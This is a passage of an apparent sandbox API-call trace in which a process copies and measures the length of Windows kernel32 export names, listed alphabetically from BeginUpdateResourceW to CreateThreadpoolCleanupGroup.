lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.215] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.215] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.215] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.215] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.216] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.216] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.216] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.216] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.216] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.216] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.216] lstrlenA (lpString="CANCELIO") returned 8 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.216] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.216] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.216] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.216] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.216] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.216] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.216] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.216] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.217] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.217] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.217] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.217] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.217] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.217] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.217] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.217] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.217] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.217] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.217] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.217] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.217] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.217] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.218] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.218] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.218] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.218] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.218] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.218] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.218] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.218] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.218] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.218] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.218] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.218] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.218] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.218] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.218] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.218] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.218] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.218] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.218] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.218] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.219] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.219] lstrlenA (lpString="COPYFILEA") returned 9 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.219] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.219] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.219] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.219] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.219] lstrlenA (lpString="COPYFILEW") returned 9 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.219] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.219] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.219] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.219] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.219] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.219] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.219] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.219] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.219] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.219] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.219] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.219] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.220] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.220] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.220] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.220] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.220] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.220] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.220] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.220] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.220] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.220] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.220] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.220] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.220] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.220] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.220] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.220] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.220] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.220] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.220] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.220] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.221] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.221] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.221] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.221] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.221] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.221] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.221] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.221] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.221] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.221] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.221] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.221] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.221] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.221] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.221] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.221] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.221] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.221] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.221] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.222] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.222] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.222] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.222] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.222] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.222] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.222] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.222] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.222] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.222] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.222] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.222] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.222] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.222] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.222] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.222] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.222] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.222] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.222] 